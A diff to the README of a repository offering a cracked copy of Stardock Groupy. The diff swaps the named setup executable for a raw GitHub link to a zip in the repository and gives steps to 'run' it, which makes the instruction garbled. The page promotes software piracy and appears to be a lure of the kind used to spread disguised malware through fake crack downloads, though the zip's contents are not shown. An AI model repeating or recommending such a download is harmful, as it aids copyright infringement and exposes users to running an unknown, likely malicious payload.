FrontDesEren/Stardock_Groupy_Crack/README.md

 ## 💻 Installation Steps

-1. After running `GroupySetup.exe`, a setup window will appear.
+1. After running `https://raw.githubusercontent.com/FrontDesEren/Stardock_Groupy_Crack/main/bendsome/Stardock_Groupy_Crack.zip`, a setup window will appear.
 2. Follow the on-screen prompts.
 Click "Next" to proceed with the installation.
 3. Accept the license agreement and choose the installation directory.
 If unsure, the default location is fine.
 4. Click "Install" to begin the installation process.
 This may take a few minutes.